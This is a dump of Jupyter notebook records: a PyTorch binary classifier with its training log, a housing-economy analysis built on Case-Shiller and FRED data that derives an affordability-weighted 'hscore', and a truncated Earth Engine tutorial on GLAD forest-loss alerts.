"[0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1]\ntensor([0., 0., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 0., 0., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1.,\n 1., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 1., 1., 0., 1.,\n 1., 0., 0., 1., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 0.,\n 1., 1., 0., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 1., 1., 1., 1., 0., 1., 0., 0., 1., 1., 0., 1., 1., 1., 1., 1.,\n 1., 1., 1., 0., 0., 0., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1.])\n1.0\n"
]
],
[
[
"### Model for Dataset3",
"_____no_output_____"
]
],
[
[
"class Feedforward_third(torch.nn.Module):\n def __init__(self, input_size, hidden_size):\n super(Feedforward_third, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.batchnorm = torch.nn.BatchNorm1d(self.hidden_size)\n self.laynorm = torch.nn.LayerNorm(self.input_size)\n self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)\n self.relu2 = torch.nn.ReLU()\n self.fc3 = torch.nn.Linear(5, 1, bias=True)\n self.sigmoid = torch.nn.Sigmoid()\n def forward(self, x):\n hidden = self.fc1(x)\n batchnorm = self.batchnorm(hidden)\n laynorm = self.laynorm(batchnorm)\n relu = self.relu(laynorm)\n output = self.fc2(relu)\n self.relu2 = torch.nn.ReLU()\n output = self.fc3(output)\n output = self.sigmoid(output)\n return output",
"_____no_output_____"
],
[
"model3 = Feedforward_third(X_train_third.shape[1],13)\ncriterion3 = torch.nn.BCELoss()\noptimizer3 = torch.optim.Adam(model3.parameters(), lr = 0.01, weight_decay= 0.001)",
"_____no_output_____"
],
[
"model3.train()\nepoch = 150\nloss_array = []\nfor epoch in range(epoch):\n optimizer3.zero_grad()\n # Forward pass\n y_pred = model3(X_train_third)\n # Compute Loss\n loss = criterion3(y_pred.squeeze(), y_train_third)\n loss_array.append(float(loss.item()))\n print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n # Backward pass\n loss.backward()\n optimizer3.step()",
"Epoch 0: train loss: 0.7449527382850647\nEpoch 1: train loss: 0.717972457408905\nEpoch 2: train loss: 0.6911874413490295\nEpoch 3: train loss: 0.665411114692688\nEpoch 4: train loss: 0.6416490077972412\nEpoch 5: train loss: 0.6199914813041687\nEpoch 6: train loss: 0.5994950532913208\nEpoch 7: train loss: 0.581000030040741\nEpoch 8: train loss: 0.5656672120094299\nEpoch 9: train loss: 0.5535496473312378\nEpoch 10: train loss: 0.5445176362991333\nEpoch 11: train loss: 0.5373896956443787\nEpoch 12: train loss: 0.5313980579376221\nEpoch 13: train loss: 0.5265540480613708\nEpoch 14: train loss: 0.5214558839797974\nEpoch 15: train loss: 0.5146776437759399\nEpoch 16: train loss: 0.5056299567222595\nEpoch 17: train loss: 0.4951423406600952\nEpoch 18: train loss: 0.4828510582447052\nEpoch 19: train loss: 0.47148430347442627\nEpoch 20: train loss: 0.46113377809524536\nEpoch 21: train loss: 0.4507763683795929\nEpoch 22: train loss: 0.4409792125225067\nEpoch 23: train loss: 0.4321078658103943\nEpoch 24: train loss: 0.42363131046295166\nEpoch 25: train loss: 0.41503894329071045\nEpoch 26: train loss: 0.4069404602050781\nEpoch 27: train loss: 0.39927226305007935\nEpoch 28: train loss: 0.391050785779953\nEpoch 29: train loss: 0.3826886713504791\nEpoch 30: train loss: 0.3748229742050171\nEpoch 31: train loss: 0.3662555515766144\nEpoch 32: train loss: 0.3579075336456299\nEpoch 33: train loss: 0.34931206703186035\nEpoch 34: train loss: 0.340321809053421\nEpoch 35: train loss: 0.33164268732070923\nEpoch 36: train loss: 0.32432985305786133\nEpoch 37: train loss: 0.3166893422603607\nEpoch 38: train loss: 0.3096335232257843\nEpoch 39: train loss: 0.3033097982406616\nEpoch 40: train loss: 0.2972005307674408\nEpoch 41: train loss: 0.2920237183570862\nEpoch 42: train loss: 0.28712186217308044\nEpoch 43: train loss: 0.2826327383518219\nEpoch 44: train loss: 0.27756237983703613\nEpoch 45: train loss: 0.2731952965259552\nEpoch 46: train loss: 0.2689567804336548\nEpoch 47: train loss: 0.26277127861976624\nEpoch 48: train loss: 0.25737234950065613\nEpoch 49: train loss: 0.2513335347175598\nEpoch 50: train loss: 0.24681732058525085\nEpoch 51: train loss: 0.24150577187538147\nEpoch 52: train loss: 0.23562508821487427\nEpoch 53: train loss: 0.2301647812128067\nEpoch 54: train loss: 0.22509264945983887\nEpoch 55: train loss: 0.21931949257850647\nEpoch 56: train loss: 0.21373581886291504\nEpoch 57: train loss: 0.20955143868923187\nEpoch 58: train loss: 0.20397253334522247\nEpoch 59: train loss: 0.19925785064697266\nEpoch 60: train loss: 0.19394251704216003\nEpoch 61: train loss: 0.18940232694149017\nEpoch 62: train loss: 0.18503163754940033\nEpoch 63: train loss: 0.18002866208553314\nEpoch 64: train loss: 0.17488576471805573\nEpoch 65: train loss: 0.17105229198932648\nEpoch 66: train loss: 0.16553591191768646\nEpoch 67: train loss: 0.16138142347335815\nEpoch 68: train loss: 0.1563856303691864\nEpoch 69: train loss: 0.1516110599040985\nEpoch 70: train loss: 0.1477835774421692\nEpoch 71: train loss: 0.14259018003940582\nEpoch 72: train loss: 0.13912305235862732\nEpoch 73: train loss: 0.1350814402103424\nEpoch 74: train loss: 0.12882369756698608\nEpoch 75: train loss: 0.12629513442516327\nEpoch 76: train loss: 0.1199156790971756\nEpoch 77: train loss: 0.1181848794221878\nEpoch 78: train loss: 0.11417809873819351\nEpoch 79: train loss: 0.10964478552341461\nEpoch 80: train loss: 0.10693181306123734\nEpoch 81: train loss: 0.10265767574310303\nEpoch 82: train loss: 0.10060574114322662\nEpoch 83: train loss: 0.09585390239953995\nEpoch 84: train loss: 0.09481451660394669\nEpoch 85: train loss: 0.0905645489692688\nEpoch 86: train loss: 0.0892648994922638\nEpoch 87: train loss: 0.08575263619422913\nEpoch 88: train loss: 0.08294343203306198\nEpoch 89: train loss: 0.0813220664858818\nEpoch 90: train loss: 0.07785503566265106\nEpoch 91: train loss: 0.07605229318141937\nEpoch 92: train loss: 0.07349050790071487\nEpoch 93: train loss: 0.07121305167675018\nEpoch 94: train loss: 0.06874813139438629\nEpoch 95: train loss: 0.06714093685150146\nEpoch 96: train loss: 0.06461171805858612\nEpoch 97: train loss: 0.0625307485461235\nEpoch 98: train loss: 0.061237312853336334\nEpoch 99: train loss: 0.058668218553066254\nEpoch 100: train loss: 0.057166531682014465\nEpoch 101: train loss: 0.055316392332315445\nEpoch 102: train loss: 0.05336199700832367\nEpoch 103: train loss: 0.05184140428900719\nEpoch 104: train loss: 0.049787502735853195\nEpoch 105: train loss: 0.04808996990323067\nEpoch 106: train loss: 0.04672490805387497\nEpoch 107: train loss: 0.04459569603204727\nEpoch 108: train loss: 0.04300931096076965\nEpoch 109: train loss: 0.04207373037934303\nEpoch 110: train loss: 0.04056253656744957\nEpoch 111: train loss: 0.03884344547986984\nEpoch 112: train loss: 0.03713357076048851\nEpoch 113: train loss: 0.035995371639728546\nEpoch 114: train loss: 0.03544396907091141\nEpoch 115: train loss: 0.03436385840177536\nEpoch 116: train loss: 0.03259531781077385\nEpoch 117: train loss: 0.031062142923474312\nEpoch 118: train loss: 0.03037857636809349\nEpoch 119: train loss: 0.030567597597837448\nEpoch 120: train loss: 0.029555130749940872\nEpoch 121: train loss: 0.027290351688861847\nEpoch 122: train loss: 0.026530077680945396\nEpoch 123: train loss: 0.026567837223410606\nEpoch 124: train loss: 0.024044036865234375\nEpoch 125: train loss: 0.0235754381865263\nEpoch 126: train loss: 0.023567525669932365\nEpoch 127: train loss: 0.02172396332025528\nEpoch 128: train loss: 0.021219631657004356\nEpoch 129: train loss: 0.02026052214205265\nEpoch 130: train loss: 0.019414860755205154\nEpoch 131: train loss: 0.018849017098546028\nEpoch 132: train loss: 0.017972737550735474\nEpoch 133: train loss: 0.017298642545938492\nEpoch 134: train loss: 0.01709897257387638\nEpoch 135: train loss: 0.016229381784796715\nEpoch 136: train loss: 0.015376945026218891\nEpoch 137: train loss: 0.015010698698461056\nEpoch 138: train loss: 0.014626932330429554\nEpoch 139: train loss: 0.01400137972086668\nEpoch 140: train loss: 0.01346670463681221\nEpoch 141: train loss: 0.013172730803489685\nEpoch 142: train loss: 0.012672406621277332\nEpoch 143: train loss: 0.012325814925134182\nEpoch 144: train loss: 0.011952350847423077\nEpoch 145: train loss: 0.011488349176943302\nEpoch 146: train loss: 0.011197001673281193\nEpoch 147: train loss: 0.010815505869686604\nEpoch 148: train loss: 0.010494096204638481\nEpoch 149: train loss: 0.010101011022925377\n"
],
[
"plt.plot(loss_array)\nplt.title(\"Training Loss of ANN on Dataset3\")\nplt.xlabel(\"Epoches\")\nplt.ylabel(\"Loss Value\")",
"_____no_output_____"
],
[
"model3.eval()\ny_pred = model3(X_test_third)\ny_pred_third_int = []\n\nfor item in y_pred:\n y_pred_third_int.append(round(float(item[0])))\n \nprint(len(y_pred_third_int))\nprint(len(y_test_third))\ny_test_third = np.array(y_test_third)\nprint(np.sum(y_pred_third_int==y_test_third)/len(y_pred_third_int))",
"32\n32\n0.78125\n"
],
[
"### accuracy on training set\ny_pred = model3(X_train_third)\ny_pred_int = []\n\nfor item in y_pred:\n y_pred_int.append(round(float(item[0])))\nprint(y_pred_int)\nprint(y_train_third)\nprint(np.sum(y_pred_int==np.array(y_train_third))/len(y_pred_int))",
"[0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1]\ntensor([0., 0., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 0., 0., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1.,\n 1., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 1., 1., 0., 1.,\n 1., 0., 0., 1., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 0.,\n 1., 1., 0., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 1., 1., 1., 1., 0., 1., 0., 0., 1., 1., 0., 1., 1., 1., 1., 1.,\n 1., 1., 1., 0., 0., 0., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1.])\n1.0\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2baf8f9249fbe9cb1a7e05d3f2bf2ce2a0d193 | 178,026 | ipynb | Jupyter Notebook | nb/fred-housing.ipynb | maidenlane/five | bf14dd37b0f14d6998893c2b0478275a0fc55a82 | [
"BSD-3-Clause"
] | 1 | 2020-04-24T05:29:26.000Z | 2020-04-24T05:29:26.000Z | fecon235-master/nb/fred-housing.ipynb | maidenlane/five | bf14dd37b0f14d6998893c2b0478275a0fc55a82 | [
"BSD-3-Clause"
] | null | null | null | fecon235-master/nb/fred-housing.ipynb | maidenlane/five | bf14dd37b0f14d6998893c2b0478275a0fc55a82 | [
"BSD-3-Clause"
] | 1 | 2020-04-24T05:34:06.000Z | 2020-04-24T05:34:06.000Z | 208.217544 | 31,548 | 0.898813 | [
[
[
"# Housing economy, home prices and affordibility\n\nAlan Greenspan in 2014 pointed out that there was never a recovery from recession \nwithout improvements in housing construction. Here we examine some relevant data, \nincluding the Case-Shiller series, and derive an insightful \nmeasure of the housing economy, **hscore**, which takes affordibility into account.\n\nContents:\n\n- Housing Starts\n- Constructing a Home Price Index\n- Real home prices\n- Indebtedness for typical home buyer\n- hscore: Housing starts scored by affordability\n- Concluding remarks",
"_____no_output_____"
],
[
"*Dependencies:*\n\n- Repository: https://github.com/rsvp/fecon235\n- Python: matplotlib, pandas\n\n*CHANGE LOG*\n\n 2016-02-08 Fix issue #2 by v4 and p6 updates.\n Our hscore index has been completely revised.\n Another 12 months of additional data.\n 2015-02-10 Code review and revision.\n 2014-09-11 First version.",
"_____no_output_____"
]
],
[
[
"from fecon235.fecon235 import *",
"_____no_output_____"
],
[
"# PREAMBLE-p6.15.1223 :: Settings and system details\nfrom __future__ import absolute_import, print_function\nsystem.specs()\npwd = system.getpwd() # present working directory as variable.\nprint(\" :: $pwd:\", pwd)\n# If a module is modified, automatically reload it:\n%load_ext autoreload\n%autoreload 2\n# Use 0 to disable this feature.\n\n# Notebook DISPLAY options:\n# Represent pandas DataFrames as text; not HTML representation:\nimport pandas as pd\npd.set_option( 'display.notebook_repr_html', False )\n# Beware, for MATH display, use %%latex, NOT the following:\n# from IPython.display import Math\n# from IPython.display import Latex\nfrom IPython.display import HTML # useful for snippets\n# e.g. HTML('<iframe src=http://en.mobile.wikipedia.org/?useformat=mobile width=700 height=350></iframe>')\nfrom IPython.display import Image \n# e.g. Image(filename='holt-winters-equations.png', embed=True) # url= also works\nfrom IPython.display import YouTubeVideo\n# e.g. YouTubeVideo('1j_HxD4iLn8', start='43', width=600, height=400)\nfrom IPython.core import page\nget_ipython().set_hook('show_in_pager', page.as_hook(page.display_page), 0)\n# Or equivalently in config file: \"InteractiveShell.display_page = True\", \n# which will display results in secondary notebook pager frame in a cell.\n\n# Generate PLOTS inside notebook, \"inline\" generates static png:\n%matplotlib inline \n# \"notebook\" argument allows interactive zoom and resize.",
" :: Python 2.7.11\n :: IPython 4.0.0\n :: jupyter 1.0.0\n :: notebook 4.0.6\n :: matplotlib 1.4.3\n :: numpy 1.10.1\n :: pandas 0.17.1\n :: pandas_datareader 0.2.0\n :: Repository: fecon235 v4.16.0123 develop\n :: Timestamp: 2016-02-10, 20:12:07 UTC\n :: $pwd: /media/yaya/virt15h/virt/dbx/Dropbox/ipy/fecon235/nb\n"
]
],
[
[
"## Housing Starts\n\n*Housing starts* is an economic indicator that reflects the number of \nprivately owned new houses (technically housing units) on which \nconstruction has been started in a given period. \nWe retrieve monthly data released by the U.S. Bureau of the Census. ",
"_____no_output_____"
]
],
[
[
"# In thousands of units:\nhs = get( m4housing )\n# m4 indicates monthly frequency.",
"_____no_output_____"
],
[
"# plot( hs )",
"_____no_output_____"
]
],
[
[
"Since housing is what houses people, over the long-term \nit is reasonable to examine **housing starts per capita**.",
"_____no_output_____"
]
],
[
[
"# US population in thousands:\npop = get( m4pop )",
"_____no_output_____"
],
[
"# Factor 100.00 converts operation to float and percentage terms:\nhspop = todf((hs * 100.00) / pop)",
"_____no_output_____"
],
[
"plot( hspop )",
"_____no_output_____"
]
],
[
[
"**At the peaks, about 1% of the *US population got allocated new housing monthly*.\nThe lowest point shown is after the Great Recession at 0.2%.**\n\nClearly there's a downward historical trend, so to discern **short-term housing cycles**,\nwe detrend and normalize hspop.",
"_____no_output_____"
]
],
[
[
"plot(detrendnorm( hspop ))",
" :: regresstime slope = -0.000742599274435\n"
]
],
[
[
"Surprisingly, housing starts per capita during the Great Recession did not\nexceed two standard deviations on the downside. \n\n2015-02-10 and 2016-02-08: It appears that housing starts has recovered relatively\nand is back to mean trend levels.\n\nIn the concluding section, we shall derive another measure of housing activity\nwhich takes affordibility into account.",
"_____no_output_____"
],
[
"## Constructing a Home Price Index\n\nThe correlation between Case-Shiller indexes, 20-city vs 10-city, is practically 1.\nThus a mash-up is warranted to get data extended back to 1987.\nCase-Shiller is not dollar denominated (but rather a chain of changes)\nso we use the median sales prices from 2000 to mid-2014 released by the\nNational Association of Realtors to estimate home price,\nsee function **gethomepx** for explicit details.",
"_____no_output_____"
]
],
[
[
"# We can use ? or ?? to extract code info:\ngethomepx??",
"_____no_output_____"
],
[
"# Our interface will not ask the user to enter such messy details...\nhomepx = get( m4homepx )\n# m4 indicates monthly home prices.",
" :: Case-Shiller prepend successfully goes back to 1987.\n"
],
[
"# Case-Shiller is seasonally adjusted:\nplot( homepx )\n# so the plot appears relatively smooth. ",
"_____no_output_____"
],
[
"# Geometric rate of return since 1987:\ngeoret( homepx, 12 )",
"_____no_output_____"
]
],
[
[
"The first element tells us home prices have increased\napproximately 3.7% per annum.\nThe third element shows price volatility of 2.5%\nwhich is very low compared to other asset classes.\n\nBut this does not take into account inflation.\nIn any case, recent home prices are still below\nthe levels just before the Great Recession.",
"_____no_output_____"
],
[
"## Real home prices",
"_____no_output_____"
]
],
[
[
"# This is an synthetic deflator created from four sources:\n# CPI and PCE, both headline and core:\ndefl = get( m4defl )",
"_____no_output_____"
],
[
"# \"Real\" will mean in terms of current dollars:\nhomepxr = todf( homepx * defl )\n# r for real ",
"_____no_output_____"
],
[
"plot( homepxr )",
"_____no_output_____"
],
[
"# Real geometric return of home prices:\ngeoret( homepxr, 12 )",
"_____no_output_____"
]
],
[
[
"*Real* home prices since 1987 have increased at the approximate\nrate of +1.3% per annum.\n\nNote that the above does not account for annual property taxes\nwhich could diminish of real price appreciation.\n\nPerhaps home prices are only increasing because new stock of housing\nhas been declining over the long-term (as shown previously).\n\nThe years 1997-2006 is considered a **housing bubble**\ndue to the widespread availability of *subprime mortgages*\n(cf. NINJA, No Income No Job Applicant, was often not rejected.)\n**Median home prices *doubled* in real terms**: from \\$140,000 to \\$280,000.\n\n**Great Recession took down home prices** (180-280)/280 = **-36% in real terms.**\n\n2015-02-10: we are roughly at 200/280 = 71% of peak home price in real terms.\n\n2016-02-08: we are roughly at 220/280 = 79% of peak home price in real terms.",
"_____no_output_____"
],
[
"## Indebtedness for typical home buyer\n\nFor a sketch, we assume a fixed premium for some long-term mortgages over 10-y Treasuries,\nand then compute the number of hours needed to \npay *only the interest on the full home price* (i.e. no down payment assumed).\n\nThis sketch does not strive for strict veracity, but simply serves as an\nindicator to model the housing economy.",
"_____no_output_____"
]
],
[
[
"mortpremium = 1.50",
"_____no_output_____"
],
[
"mortgage = todf( get(m4bond10) + mortpremium )",
"_____no_output_____"
],
[
"# Yearly interest to be paid off:\ninterest = todf( homepx * (mortgage / 100.00) )",
"_____no_output_____"
],
[
"# Wage is in dollars per hour:\nwage = get( m4wage )",
"_____no_output_____"
],
[
"# Working hours to pay off just the interest:\ninteresthours = todf( interest / wage )",
"_____no_output_____"
],
[
"# Mortgage interest to be paid as portion of ANNUAL income,\n# assuming 2000 working hours per year:\npayhome = todf( interesthours / 2000.00 )\n\n# We ignore tiny portion of mortgage payment made towards reducing principal.\n# And of course, the huge disparity in earned income among the population.",
"_____no_output_____"
],
[
"plot( payhome )",
"_____no_output_____"
]
],
[
[
"If we assume 2000 hours worked per year (40 hours for 50 weeks), we can see that\ninterest payment can potentially take up to 50% of total annual pre-tax income. \n\n2015-02-10: Currently that figure is about 20% so housing should be affordable,\nbut the population is uncertain about the risk on taking on debt.\n(What if unemployment looms in the future?) \n\nProspects of deflation adds to the fear of such risk.\nDebt is best taken on in inflationary environments.\n\nThe housing bubble clearly illustrated that\nhuge *price risk* of the underlying asset could be an important consideration.\n\nThus the renting a home (without any equity stake) may appear preferable over buying a home.",
"_____no_output_____"
]
],
[
[
"# # Forecast payhome for the next 12 months:\n# forecast( payhome, 12 )",
"_____no_output_____"
]
],
[
[
"2016-02-09: Homes should be slightly more affordable: 19% of annual income -- perhaps\ndue to further declining interest rates, or even some\nincrease in wages for the typical American worker.\n\nCaution: although the numbers may indicate increased affordability,\nit has become *far more difficult to obtain mortgage financing due to\nstrict credit requirements*. The pendulum of scrutiny from the NINJA days of the\nsubprime era has swung to the opposite extreme.\nSubprime mortgages were the root cause of the Great Recession.\nThis would require another notebook which studies credit flows\nfrom financial institutions to home buyers.\n\nGreat Recession: There is evidence recently that families shifted to home rentals,\navoiding home ownership which would entail taking on mortgage debt.\nSome home owners experienced negative equity.\nAnd when the debt could not be paid due to wage loss, it seemed reasonable to\nwalk away from their homes, even if that meant damage to their credit worthiness.\n*Housing construction had to compete with a large supply of foreclosed homes on the market.*",
"_____no_output_____"
],
[
"## hscore: Housing starts scored by affordability\n\nThe basic idea here is that housing starts can be weighted by some\nproxy of \"affordability.\"\nAn unsold housing unit cannot be good for a healthy economy.\n\nRecall that our variable *payhome* was constructed as a function of\nhome price, interest rate, and wage income -- to solve for the portion\nof annual income needed to pay off a home purchase -- i.e. indebtedness.\n\n**Home affordability** can thus be *abstractly* represented as 0 < (1-payhome) < 1,\nby ignoring living expenses of the home buyer.",
"_____no_output_____"
]
],
[
[
"afford = todf( 1 - payhome )",
"_____no_output_____"
],
[
"# hspop can be interpreted as the percentage of the population allocated new housing.\n\n# Let's weight hspop by afford to score housing starts...\nhscore = todf( hspop * afford )\n\n# ... loosely interpretated as new \"affordable\" housing relative to population.",
"_____no_output_____"
],
[
"plot( hscore )",
"_____no_output_____"
],
[
"stat( hscore )",
" Y\ncount 347.000000\nmean 0.313257\nstd 0.091287\nmin 0.124288\n25% 0.244456\n50% 0.316766\n75% 0.387574\nmax 0.483924\n"
]
],
[
[
"**hscore** can be roughly interpreted as \"affordable\" housing starts\nexpressed as percentage of the total U.S. population.\n\nThe overall mean of *hscore* is approximately 0.31, and we observe a band between\n0.31 and 0.47 from 1993 to 2004.\nThat band could be interpreted as an equilibrium region for the housing economy\n(before the Housing Bubble and Great Recession).\nIt's also worth noting that long-term interest rates during that epoch was\ndetermined by the market -- yet untouched by the massive *quantitative easing*\nprograms initiated by the Federal Reserve.",
"_____no_output_____"
]
],
[
[
"# Forecast for hscore, 12-months ahead:\nforecast( hscore, 12 )",
"_____no_output_____"
]
],
[
[
"## Concluding remarks\n\nWe created an index **hscore** which expresses new \"affordable\" housing units\nas percentage of total population. Affordability was crudely modeled by a few\nwell-known economic variables, plus our extended Case-Schiller index\nof median home prices.\n\n- 2016-02-09 Following the Great-Recession lows around 0.13, *hscore* has now reverted to its long-term mean of 0.31, *confirming the recovery*, and is forecasted to slightly increase to 0.33.\n\n\n- The Fed terminated its QE program but has not sold off any of its mortgage securities. That reduces upward pressure on mortgage rates. However, our *hscore* supports the Fed's rate hike decision on 2015-12-16 since it gives evidence that the housing market has recovered midway between the housing bubble and the subprime mortgage crisis.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2bc04094be181a5cc84d94ce57b4f6a39a40dc | 19,456 | ipynb | Jupyter Notebook | Tutorials/Keiko/glad_alert.ipynb | pberezina/earthengine-py-notebooks | 4cbe3c52bcc9ed3f1337bf097aa5799442991a5e | [
"MIT"
] | 1 | 2020-03-20T19:39:34.000Z | 2020-03-20T19:39:34.000Z | Tutorials/Keiko/glad_alert.ipynb | pberezina/earthengine-py-notebooks | 4cbe3c52bcc9ed3f1337bf097aa5799442991a5e | [
"MIT"
] | null | null | null | Tutorials/Keiko/glad_alert.ipynb | pberezina/earthengine-py-notebooks | 4cbe3c52bcc9ed3f1337bf097aa5799442991a5e | [
"MIT"
] | null | null | null | 74.259542 | 10,788 | 0.807566 | [
[
[
"<table class=\"ee-notebook-buttons\" align=\"left\">\n <td><a target=\"_blank\" href=\"https://github.com/giswqs/earthengine-py-notebooks/tree/master/Tutorials/Keiko/glad_alert.ipynb\"><img width=32px src=\"https://www.tensorflow.org/images/GitHub-Mark-32px.png\" /> View source on GitHub</a></td>\n <td><a target=\"_blank\" href=\"https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Tutorials/Keiko/glad_alert.ipynb\"><img width=26px src=\"https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png\" />Notebook Viewer</a></td>\n <td><a target=\"_blank\" href=\"https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=Tutorials/Keiko/glad_alert.ipynb\"><img width=58px src=\"https://mybinder.org/static/images/logo_social.png\" />Run in binder</a></td>\n <td><a target=\"_blank\" href=\"https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Tutorials/Keiko/glad_alert.ipynb\"><img src=\"https://www.tensorflow.org/images/colab_logo_32px.png\" /> Run in Google Colab</a></td>\n</table>",
"_____no_output_____"
],
[
"## Install Earth Engine API\nInstall the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.\nThe following script checks if the geehydro package has been installed. If not, it will install geehydro, which automatically install its dependencies, including earthengine-api and folium.",
"_____no_output_____"
]
],
[
[
"import subprocess\n\ntry:\n import geehydro\nexcept ImportError:\n print('geehydro package not installed. Installing ...')\n subprocess.check_call([\"python\", '-m', 'pip', 'install', 'geehydro'])",
"_____no_output_____"
]
],
[
[
"Import libraries",
"_____no_output_____"
]
],
[
[
"import ee\nimport folium\nimport geehydro",
"_____no_output_____"
]
],
[
[
"Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once. ",
"_____no_output_____"
]
],
[
[
"try:\n ee.Initialize()\nexcept Exception as e:\n ee.Authenticate()\n ee.Initialize()",
"_____no_output_____"
]
],
[
[
"## Create an interactive map \nThis step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function. \nThe optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.",
"_____no_output_____"
]
],
[
[
"Map = folium.Map(location=[40, -100], zoom_start=4)\nMap.setOptions('HYBRID')",
"_____no_output_____"
]
],
[
[
"## Add Earth Engine Python script ",
"_____no_output_____"
]
],
[
[
"# Credits to: Keiko Nomura, Senior Analyst, Space Intelligence Ltd\n# Source: https://medium.com/google-earth/10-tips-for-becoming-an-earth-engine-expert-b11aad9e598b\n# GEE JS: https://code.earthengine.google.com/?scriptPath=users%2Fnkeikon%2Fmedium%3Afire_australia \n\ngeometry = ee.Geometry.Polygon(\n [[[153.11338711694282, -28.12778417421283],\n [153.11338711694282, -28.189835226562256],\n [153.18943310693305, -28.189835226562256],\n [153.18943310693305, -28.12778417421283]]])\nMap.centerObject(ee.FeatureCollection(geometry), 14)\n\nimageDec = ee.Image('COPERNICUS/S2_SR/20191202T235239_20191202T235239_T56JNP')\nMap.addLayer(imageDec, {\n 'bands': ['B4', 'B3', 'B2'],\n 'min': 0,\n 'max': 1800\n}, 'True colours (Dec 2019)')\nMap.addLayer(imageDec, {\n 'bands': ['B3', 'B3', 'B3'],\n 'min': 0,\n 'max': 1800\n}, 'grey')\n\n# GLAD Alert (tree loss alert) from the University of Maryland\nUMD = ee.ImageCollection('projects/glad/alert/UpdResult')\nprint(UMD)\n\n# conf19 is 2019 alert 3 means multiple alerts\nASIAalert = ee.Image('projects/glad/alert/UpdResult/01_01_ASIA') \\\n .select(['conf19']).eq(3)\n\n# Turn loss pixels into True colours and increase the green strength ('before' image)\nimageLoss = imageDec.multiply(ASIAalert)\nimageLoss_vis = imageLoss.selfMask().visualize(**{\n 'bands': ['B4', 'B3', 'B2'],\n 'min': 0,\n 